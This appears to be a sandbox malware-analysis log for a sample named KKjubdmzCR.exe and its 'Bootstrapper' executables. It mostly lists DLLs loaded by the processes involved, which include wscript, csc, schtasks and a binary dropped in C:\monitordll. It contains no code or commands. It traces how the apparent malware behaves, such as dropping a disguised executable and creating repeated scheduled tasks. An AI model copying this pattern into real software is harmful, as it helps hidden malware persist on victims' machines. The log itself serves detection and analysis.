Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: mscoree.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: apphelp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: kernel.appcore.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: version.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: uxtheme.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: windows.storage.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: wldp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: profapi.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: cryptsp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: rsaenh.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: cryptbase.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: sspicli.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ktmw32.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ntmarta.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: wbemcomn.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: amsi.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: userenv.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: propsys.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: dlnashext.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: wpdshext.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: edputil.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: urlmon.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: iertutil.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: srvcli.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: netutils.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: wintypes.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: appresolver.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: bcp47langs.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: slc.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: sppc.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: mscoree.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: kernel.appcore.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: version.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: uxtheme.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: windows.storage.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: wldp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: profapi.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: cryptsp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: rsaenh.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: cryptbase.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: sspicli.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: mscoree.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: kernel.appcore.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: version.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: uxtheme.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: windows.storage.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: wldp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: profapi.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: cryptsp.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: rsaenh.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: cryptbase.dll
Source: C:\monitordll\componentreviewsavesSession.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll

Source: C:\Users\user\Desktop\KKjubdmzCR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\BootstrapperV1.23.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: KKjubdmzCR.exe

